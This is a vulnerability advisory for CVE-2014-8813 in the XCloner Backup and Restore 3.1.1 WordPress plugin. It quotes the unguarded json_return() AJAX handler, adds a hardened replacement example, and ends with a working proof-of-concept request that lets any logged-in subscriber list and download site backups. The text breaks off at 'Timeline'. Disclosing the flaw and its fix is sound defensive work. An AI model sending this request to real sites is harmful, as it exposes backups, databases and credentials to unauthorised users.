XCloner Backup and Restore 3.1.1 Backup Download

Homepage:

https://wordpress.org/plugins/xcloner-backup-and-restore/

CVE-ID

CVE-2014-8813

CVSS Score

6.8

CVSS Vector

(AV:N/AC:L/Au:S/C:C/I:N/A:N)

Description:

A similar issue was discovered by Larry W. Cashdollar at around the same time (you can compare the file SHA1 with my tweet).

The json_return() function is registered as a wp_ajax_json_return AJAX handler. A wp_ajax_ hook only guarantees that the caller is logged in; json_return() itself performs no capability check (e.g. current_user_can('manage_options')) and no nonce check, so any authenticated user, including a freshly registered subscriber, can reach admin.cloner.php through wp-admin/admin-ajax.php.

File: xcloner-backup-and-restore\xcloner.php

// Registered only for authenticated users (wp_ajax_*), but with no capability
// or nonce check of its own, so any logged-in role reaches admin.cloner.php.
add_action( 'wp_ajax_json_return', 'json_return' );
function json_return(){
	$_REQUEST['nohtml'] = 1;          // attacker-controlled parameters such as 'task' pass through untouched
	include "admin.cloner.php";       // dispatches on $_REQUEST['task'] (see below)
	die();
}

So any logged-in user can view and download already created backups: the 'view' task below renders the contents of the backup directory.

File: xcloner-backup-and-restore\admin.cloner.php

// Request dispatcher (excerpt): $task comes straight from the request with no validation.
$task = $_REQUEST['task'];
switch ($task) {
    case 'view':
        showBackups($option);   // lists the backup archives in $_CONFIG['clonerPath']
    break;
}
function showBackups($option)
{
    // ----------------------------------------------------------
    // Generate a selectable list of the files in Backup Folder
    // ----------------------------------------------------------
    global $_CONFIG;

    if (!is_dir($_CONFIG['clonerPath'])) {
        E_print("Your backup directory " . $_CONFIG['clonerPath'] . " is not correct! Unable to continue...");
        return;
    }

    // initialise list arrays, directories and files separately and array counters for them
    $d_arr = array();
    $d = 0;
    $f_arr = array();
    $f = 0;
    $s_arr = array();
    $s = 0;

    // obtain the list of backup archive files
    getBackupFiles($d_arr, $f_arr, $s_arr, $d, $f);

    // load presentation layer
    $html = new HTML_cloner();
    $html->showBackups($f_arr, $s_arr, $_CONFIG['clonerPath'], $option);
}
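The following is an added example of how json_return() should be guarded; it is not the plugin's own code or a vendor patch. It assumes the XCloner admin page is restricted to the manage_options capability and that the admin UI emits a nonce with the action name 'xcloner_json_return' (both names are assumptions); the task whitelist only contains 'view' because that is the only task shown on this page.

```php
<?php
// Added example (not the plugin's code): hardened replacement for json_return().
// Assumptions: admin page requires manage_options; admin UI emits a nonce with
// action 'xcloner_json_return' via wp_nonce_field()/wp_create_nonce().

// Registered for authenticated users only. Deliberately no
// wp_ajax_nopriv_json_return hook: anonymous requests must not reach this handler.
add_action( 'wp_ajax_json_return', 'json_return' );

function json_return() {
    // 1. Capability check. wp_ajax_* only proves *some* user is logged in;
    //    a subscriber created via wp-login.php?action=register clears that bar,
    //    so the handler must check the capability the admin page itself requires.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', 'Forbidden', array( 'response' => 403 ) );
    }

    // 2. CSRF check. Requires the nonce the admin page emitted; check_ajax_referer()
    //    terminates the request with -1 when the nonce is missing or invalid.
    check_ajax_referer( 'xcloner_json_return', '_ajax_nonce' );

    // 3. Constrain 'task' to known handlers instead of forwarding raw request input
    //    (whitelist assumed for illustration; 'view' is the task shown in this advisory).
    $allowed_tasks = array( 'view' );
    $task = isset( $_REQUEST['task'] ) ? sanitize_key( $_REQUEST['task'] ) : '';
    if ( ! in_array( $task, $allowed_tasks, true ) ) {
        wp_die( 'Unknown task', 'Bad Request', array( 'response' => 400 ) );
    }

    // Only now hand off to the plugin's dispatcher; use an absolute path rather than
    // relying on the include_path resolution of a bare "admin.cloner.php".
    $_REQUEST['nohtml'] = 1;
    include plugin_dir_path( __FILE__ ) . 'admin.cloner.php';
    die();
}
```

The order matters: the capability check comes first so that an unprivileged user learns nothing from the nonce or task validation, and the nonce check comes before the include so that an administrator cannot be made to list or fetch backups via a cross-site request. With this guard in place the proof-of-concept request below, sent with a subscriber session, receives a 403 instead of the backup listing.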

Proof of Concept:

Register as a standard user via wp-login.php?action=register (this only works when the site has "Anyone can register" enabled; any existing low-privilege account, e.g. a subscriber, works just as well), then log in via wp-login.php.

http://wordpress-installation/wp-admin/admin-ajax.php?action=json_return&task=view

Timeline: